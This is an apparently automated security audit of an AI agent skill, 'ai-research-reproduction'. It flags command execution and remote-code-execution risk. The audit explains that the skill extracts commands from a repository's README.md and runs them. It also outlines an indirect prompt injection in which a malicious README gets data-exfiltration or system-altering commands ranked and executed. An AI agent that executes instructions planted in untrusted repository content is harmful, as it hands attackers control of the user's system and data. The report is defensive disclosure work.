ai-research-reproduction

Warn

Audited by Gen Agent Trust Hub on Apr 14, 2026

Risk Level: MEDIUMCOMMAND_EXECUTIONREMOTE_CODE_EXECUTION
Full Analysis
  • [COMMAND_EXECUTION]: The script scripts/orchestrate_repro.py contains several uses of subprocess.run. It executes both internal helper scripts and, more critically, commands extracted from the documentation of the repository being analyzed.
  • [REMOTE_CODE_EXECUTION]: The orchestration logic specifically extracts "documented commands" from a repository's README.md (processed by extract_commands.py) and executes them in maybe_run_command and maybe_run_training. This design allows content from an external, untrusted repository to dictate arbitrary code execution on the user's system. Although the skill enforces a 'minimal trustworthy target' policy, it remains a high-risk capability if used on malicious repositories.
  • [PROMPT_INJECTION]: The skill is vulnerable to indirect prompt injection. A malicious actor could craft a README.md with dangerous commands (e.g., system modification or data exfiltration) that are prioritized by the skill's heuristic scoring mechanism (command_score in scripts/orchestrate_repro.py) and then proposed for execution. The current implementation uses shlex.split for argument parsing but does not sanitize the command strings themselves against malicious intent.
Audit Metadata
Risk Level
MEDIUM
Analyzed
Apr 14, 2026, 09:49 AM